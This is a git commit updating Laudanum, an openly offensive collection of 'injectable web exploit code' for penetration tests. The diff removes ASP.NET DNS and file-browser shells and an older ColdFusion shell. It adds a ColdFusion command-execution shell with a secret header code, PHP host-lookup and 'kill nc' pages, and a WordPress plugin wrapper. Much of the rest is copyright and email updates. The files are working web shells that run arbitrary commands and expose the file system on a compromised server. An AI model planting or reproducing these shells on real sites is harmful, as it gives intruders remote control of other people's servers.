updated to laudanum v1.0

This commit is contained in:
Jitendra Patro 2023-05-18 17:39:10 +05:30
parent 39657bcc05
commit 465897e556
34 changed files with 2119 additions and 428 deletions

View File

@ -1,144 +0,0 @@
<%@ Page Language="C#"%>
<%@ Import Namespace="System" %>
<html><head><title>Laudanum - DNS</title></head><body>
<script runat="server">
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.com
*** laudanum@secureideas.com
*** Project Leads:
*** Kevin Johnson <kevin@secureideas.com>
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
*** This file provides shell access to DNS on the system.
*** Written by James Jardine <james@secureideas.com>
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
// ********************* Config entries below ***********************************
// IPs are enterable as individual addresses
string[] allowedIPs = new string[3] { "::1", "", "" };
// ***************** No editable content below this line **************************
string stdout = "";
string stderr = "";
string[] qtypes = "Any,A,AAAA,A+AAAA,CNAME,MX,NS,PTR,SOA,SRV".Split(',');
void die() {
HttpContext.Current.Response.StatusCode = 404;
HttpContext.Current.Response.StatusDescription = "Not Found";
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
void Page_Load(object sender, System.EventArgs e) {
// check if the X-Fordarded-For header exits
string remoteIp;
if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
remoteIp = Request.UserHostAddress;
} else {
remoteIp = HttpContext.Current.Request.Headers["X-Forwarded-For"].Split(new char[] { ',' })[0];
bool validIp = false;
foreach (string ip in allowedIPs) {
validIp = (validIp || (remoteIp == ip));
if (!validIp) {
string qType = "Any";
bool validType = false;
if (Request.Form["type"] != null)
qType = Request.Form["type"].ToString();
foreach (string s in qtypes)
if (s == qType)
validType = true;
if (!validType)
qType = "Any";
if (Request.Form["query"] != null)
string query = Request.Form["query"].Replace(" ", string.Empty).Replace(" ", string.Empty);
if(query.Length > 0)
System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("nslookup", "-type=" + qType + " " + query);
// The following commands are needed to redirect the standard output and standard error.
procStartInfo.RedirectStandardOutput = true;
procStartInfo.RedirectStandardError = true;
procStartInfo.UseShellExecute = false;
// Do not create the black window.
procStartInfo.CreateNoWindow = true;
// Now we create a process, assign its ProcessStartInfo and start it
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo = procStartInfo;
// Get the output and error into a string
stdout = p.StandardOutput.ReadToEnd();
stderr = p.StandardError.ReadToEnd();
<form method="post">
QUERY: <input type="text" name="query"/><br />
Type: <select name="type">
foreach (string s in qtypes)
Response.Write("<option value=\"" + s + "\">" + s + "</option>");
<input type="submit"><br/>
<pre><% = stdout.Replace("<", "&lt;") %></pre>
<pre><% = stderr.Replace("<", "&lt;") %></pre>

View File

@ -1,154 +0,0 @@
<%@ Page Language="C#"%>
<%@ Import Namespace="System" %>
<html><head><title>Laudanum - File</title></head><body>
<script runat="server">
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.com
*** laudanum@secureideas.com
*** Project Leads:
*** Kevin Johnson <kevin@secureideas.com>
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
*** This file allows browsing of the file system
*** Written by James Jardine <james@secureideas.com>
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
********************************************************************************* */
// ********************* Config entries below ***********************************
// IPs are enterable as individual addresses
string[] allowedIPs = new string[3] {"::1", "",""};
// ***************** No editable content below this line **************************
bool allowed = false;
string dir = "";
string file = "";
void Page_Load(object sender, System.EventArgs e)
foreach (string ip in allowedIPs)
if (HttpContext.Current.Request.ServerVariables["REMOTE_ADDR"] == ip)
allowed = true;
if (!allowed)
//dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Environment.SystemDirectory;
dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Server.MapPath(".");
file = Request.QueryString["file"] != null ? Request.QueryString["file"] : "";
if (file.Length > 0)
if (System.IO.File.Exists(file))
void writefile()
Response.ContentType = "text/plain";
//Uncomment the next line if you would prefer to download the file vs display it.
//Response.AddHeader("Content-Disposition", "attachment; filename=" + file + ";");
void die() {
HttpContext.Current.Response.StatusCode = 404;
HttpContext.Current.Response.StatusDescription = "Not Found";
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
<% string[] breadcrumbs = dir.Split('\\');
string breadcrumb = "";
foreach (string b in breadcrumbs)
if (b.Length > 0)
breadcrumb += b + "\\";
Response.Write("<a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(breadcrumb) + "\">" + Server.HtmlEncode(b) + "</a>");
Response.Write(" / ");
if (System.IO.Directory.Exists(dir))
string[] folders = System.IO.Directory.GetDirectories(dir);
foreach (string folder in folders)
Response.Write("<tr><td><a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(folder) + "\">" + Server.HtmlEncode(folder) + "</a></td><td></td><td></td></tr>");
Response.Write("This directory doesn't exist: " + Server.HtmlEncode(dir));
catch (System.UnauthorizedAccessException ex)
Response.Write("You Don't Have Access to this directory: " + Server.HtmlEncode(dir));
System.IO.DirectoryInfo di = new System.IO.DirectoryInfo(dir);
System.IO.FileInfo[] files = di.GetFiles();
foreach (System.IO.FileInfo f in files)
Response.Write("<tr><td><a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(dir) + "&file=" + Server.UrlEncode(f.FullName) + "\">" + Server.HtmlEncode(f.Name) + "</a></td><td>" + f.CreationTime.ToString() + "</td><td>" + f.Length.ToString() + "</td></tr>");

View File

@ -1,80 +0,0 @@
<cfapplication scriptProtect="none">
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@securitywhole.com>
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
*** This file provides access to shell acces on the system.
*** Modified by Tim Medin
*** TODO: Fix the problem with quotes
*** Add authentication
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1^
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
<cfif #cgi.remote_addr# neq "">
<cfheader statuscode="404" statustext="Page Not Found" />
<cfabort />
<head><title>Laudanum Coldfusion Shell</title></head>
<form action="shell.cfm" method="POST">
<cfif IsDefined("form.cmd")>
Executable: <Input type="text" name="cmd" value="<cfoutput>#HTMLEditFormat(form.cmd)#</cfoutput>"> For Windows use: cmd.exe or the full path to cmd.exe<br>
Arguments: <Input type="text" name="arguments" value="<cfoutput>#HTMLEditFormat(form.arguments)#</cfoutput>"> For Windows use: /c <i>command</i><br>
Executable: <Input type="text" name="cmd" value="cmd.exe"><br>
Arguments: <Input type="text" name="arguments" value="/c "><br>
<input type="submit">
<cfif IsDefined("form.cmd")>
<cfexecute name="#Replace(preservesinglequotes(form.cmd), QuoteMark, DoubleQuoteMark, 'All')#" arguments="#Replace(preservesinglequotes(form.arguments), QuoteMark, DoubleQuoteMark, 'All')#" timeout="5" variable="foo"></cfexecute>
<cfoutput>#Replace(foo, "<", "&lt;", "All")#</cfoutput>
Note: The cold fusion command that executes shell commands strips quotes, both double and single, so be aware.
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.

View File

@ -2,16 +2,14 @@ The Team
- Kevin Johnson
- Project Lead
- Justin Searle
- Core Developer
- Tim Medin
- Core Developer
- Project Lead
- James Jardine
- Core Developer
- Justin Searle
- Core Developer
Additional Coding
- Robin Wood
- Jason Gillam (Wordpress Plugin)

View File

@ -1,4 +1,4 @@
Laudanum: Injectable Web Exploit Code v0.4
Laudanum: Injectable Web Exploit Code v0.8
By Kevin Johnson <kjohnson@secureideas.net>
and the Laudanum Development Team
@ -9,7 +9,7 @@ Sourceforge Site: http://sourceforge.net/projects/laudanum
SVN : svn co https://laudanum.svn.sourceforge.net/svnroot/laudanum laudanum
** Copyright (C) 2012 Kevin Johnson and the Laudanum Project Team
** Copyright (C) 2014 Kevin Johnson and the Laudanum Project Team
** This program is free software; you can redistribute it and/or modify
** it under the terms of the GNU General Public License as published by

View File

@ -10,14 +10,14 @@
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com>
' *** Tim Medin <tim@counterhack.com>
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** This file provides access to DNS on the system.
' *** Written by Tim Medin <timmedin@gmail.com>
' *** Written by Tim Medin <tim@counterhack.com>
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
@ -143,7 +143,7 @@ end if
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.

View File

@ -13,14 +13,14 @@
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com>
' *** Tim Medin <tim@counterhack.com>
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** This file provides access to the file system.
' *** Written by Tim Medin <timmedin@gmail.com>
' *** Written by Tim Medin <tim@counterhack.com>
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
@ -170,7 +170,7 @@ next
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.

View File

@ -13,14 +13,14 @@
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com>
' *** Tim Medin <tim@counterhack.com>
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** This file provides access as a proxy.
' *** Written by Tim Medin <timmedin@gmail.com>
' *** Written by Tim Medin <tim@counterhack.com>
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
@ -74,7 +74,7 @@ function err_handler()
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
@ -341,7 +341,7 @@ if len(FullUrl) = 0 then
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.

View File

@ -10,14 +10,14 @@
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com>
' *** Tim Medin <tim@counterhack.com>
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** Updated and fixed by Robin Wood <Digininja>
' *** Updated and fixed by Tim Medin <tim@securitywhole.com
' *** Updated and fixed by Tim Medin <tim@counterhack.com
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
@ -75,7 +75,7 @@ Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.

View File

@ -14,9 +14,9 @@
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@securitywhole.com>
*** Tim Medin <tim@counterhack.com>
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
@ -120,10 +120,10 @@ STDERR:<br/>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.

View File

@ -0,0 +1,99 @@
<cfapplication scriptProtect="none">
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@securitywhole.com>
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file provides access to shell acces on the system.
*** Modified by Tim Medin
*** Modified by Matt Presson <@matt_presson>
*** - Added some basic authentication via HTTP header
*** - Resolved cfexecute stripping quotes
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1^
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
<cfset secretCode = "a208bddb1f68aa8a8641b65d93979740c82fb387" /> <!--- Set this to something unique like a randomly generated SHA1 Hash --->
<cfset QuoteMark = "'" />
<cfset DoubleQuoteMark = """" />
<!--- Authentication: Check for the GUID in either a custom header or POSTed by the form --->
<cfset suppliedCode = "" />
<cfif structKeyExists(GetHttpRequestData().headers, "X-Auth-Code")>
<cfset suppliedCode = "#StructFind(GetHttpRequestData().headers, "X-Auth-Code")#" />
<cfelseif structKeyExists(FORM, "authCode")>
<cfset suppliedCode = "#StructFind(FORM, "authCode")#" />
<cfif ( #suppliedCode# neq secretCode )>
<cfheader statuscode="404" statustext="Page Not Found" />
<cfabort />
<head><title>Laudanum Coldfusion Shell</title></head>
<form action="<cfoutput>#cgi.script_name#</cfoutput>" method="POST">
<cfif IsDefined("form.cmd")>
Executable: <Input type="text" name="cmd" value="<cfoutput>#HTMLEditFormat(form.cmd)#</cfoutput>"> For Windows use: cmd.exe or the full path to cmd.exe<br>
Arguments: <Input type="text" name="arguments" value="<cfoutput>#HTMLEditFormat(form.arguments)#</cfoutput>"> For Windows use: /c <i>command</i><br>
Executable: <Input type="text" name="cmd" value="cmd.exe"><br>
Arguments: <Input type="text" name="arguments" value="/c "><br>
<input type="hidden" name="authCode" value="<cfoutput>#HTMLEditFormat(suppliedCode)#</cfoutput>">
<input type="submit">
<!--- Updated the call to cfexecute so use an array instead of a string. This way quotes are not stripped. --->
<cfif IsDefined("form.cmd")>
<cfset argumentsArray = #listToArray(form.arguments, " ")# />
<cfexecute name="#Replace(preservesinglequotes(form.cmd), QuoteMark, DoubleQuoteMark, 'All')#" arguments="#argumentsArray#" timeout="5" variable="foo"></cfexecute>
<cfoutput>#Replace(foo, "<", "&lt;", "All")#</cfoutput>
Note: The cold fusion command that executes shell commands strips quotes, both double and single, so be aware.
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Bug fixes by Matt Presson<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.

View File

@ -34,7 +34,7 @@ disr = dis.readLine();
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.

View File

@ -10,14 +10,14 @@
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@securitywhole.com>
*** Tim Medin <tim@counterhack.com>
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file provides access to DNS on the system.
*** Written by Tim Medin <tim@securitywhole.com>
*** Written by Tim Medin <tim@counterhack.com>
*** This program is free software; you can redistribute it and/or
@ -79,7 +79,7 @@ function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
@ -152,7 +152,7 @@ if ($query != '')
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.

View File

@ -10,14 +10,15 @@
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@securitywhole.com>
*** Tim Medin <tim@counterhack.com>
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file allows browsing of the file system.
*** Written by Tim Medin <tim@securitywhole.com>
*** Written by Tim Medin <tim@counterhack.com>
*** 2013-12-28 Updated by Jason Gillam - fixed parent folder
*** This program is free software; you can redistribute it and/or
@ -79,7 +80,7 @@ function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
@ -150,7 +151,7 @@ for ($i = 0; $i < count($dirs) - 2; $i++) {
echo "<table>";
echo "<tr><th>Name</th><th>Date</th><th>Size</th></tr>";
echo "<tr><td><a href=\"" . $_SERVER['PHP_SELF'] . "?dir=$parentdir\">../</a></td><td> </td><td> </td></tr>";
echo "<tr><td><a href=\"" . $_SERVER['PHP_SELF'] . "?dir=" . $parentdir . "\">../</a></td><td> </td><td> </td></tr>";
//get listing, separate into directories and files
$listingfiles = array();
@ -187,7 +188,7 @@ else {
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.

View File

@ -0,0 +1,142 @@
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file provides a host lookup by ip address.
*** Adapted from Laudanum dns.php by Jason Gillam <jgillam@secureideas.com>
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
// ***************** Config entries below ***********************
// IPs are enterable as individual addresses TODO: add CIDR support
$allowedIPs = array("", "");
# *********** No editable content below this line **************
$allowed = 0;
foreach ($allowedIPs as $IP) {
$allowed = 1;
if ($allowed == 0) {
header("HTTP/1.0 404 Not Found");
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
<title>Laudanum PHP Hostname by IP Lookup</title>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
/* Initialize some variables we need again and again. */
$query = isset($_POST['query']) ? $_POST['query'] : '';
$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY';
<title>Laudanum Host Lookup</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
function init() {
<body onload="init()">
<h1>Host Lookup 0.1</h1>
<form name="dns" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST">
<legend>Host Lookup:</legend>
<p>IP:<input name="query" type="text">
<input type="submit" value="Submit">
if ($query != '')
$result = gethostbyaddr($query);
echo "<pre><results>";
echo "Result = ";
echo "</results></pre>";
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.

View File

@ -0,0 +1,119 @@
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@counterhack.com>
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file attempts to kill all netcat processes spawned by the current user.
*** This may be useful in cases where a reverse shell attempt has gone wrong.
*** Written by Jason Gillam <jgillam@secureideas.com>
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
// ***************** Config entries below ***********************
// IPs are enterable as individual addresses TODO: add CIDR support
$allowedIPs = array("", "");
# *********** No editable content below this line **************
$allowed = 0;
foreach ($allowedIPs as $IP) {
$allowed = 1;
if ($allowed == 0) {
header("HTTP/1.0 404 Not Found");
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
<title>Laudanum PHP Hostname by IP Lookup</title>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
<title>Laudanum Kill nc</title>
<link rel="stylesheet" href="style.css" type="text/css">
<h1>Kill nc 0.1</h1>
<?php echo exec('killall nc');?>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.

View File

@ -11,14 +11,14 @@ ini_set('session.use_cookies', '0');
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@securitywhole.com>
*** Tim Medin <tim@counterhack.com>
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file allows browsing of the file system.
*** Written by Tim Medin <tim@securitywhole.com>
*** Written by Tim Medin <tim@counterhack.com>
*** This program is free software; you can redistribute it and/or
@ -81,7 +81,7 @@ function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
@ -268,7 +268,7 @@ if ($url == "") {
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.

View File

@ -10,9 +10,9 @@
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@securitywhole.com>
*** Tim Medin <tim@counterhack.com>
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
@ -87,7 +87,7 @@ function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
Copyright &copy; 2012, <a
Copyright &copy; 2014, <a
href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
@ -400,7 +400,7 @@ echo rtrim($padding . $_SESSION['output']);
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Updated by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.

View File

@ -0,0 +1,108 @@
* Plugin Name: Laudanum
* Description: This plugin is leveraged for running security tests and should be left disabled when not in use.
* Author: Jason Gillam and the Laudanum Team
* Version: 0.02
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@counterhack.com>
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file is a Word Press plugin wrapper for Laudanum's PHP tools. As with
*** other Word Press plugins, this entire directory should be zipped up for deployment.
*** The templates/ipcheck.php file should be updated with the tester's IP address first.
*** Written by Jason Gillam <jgillam@secureideas.com>
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
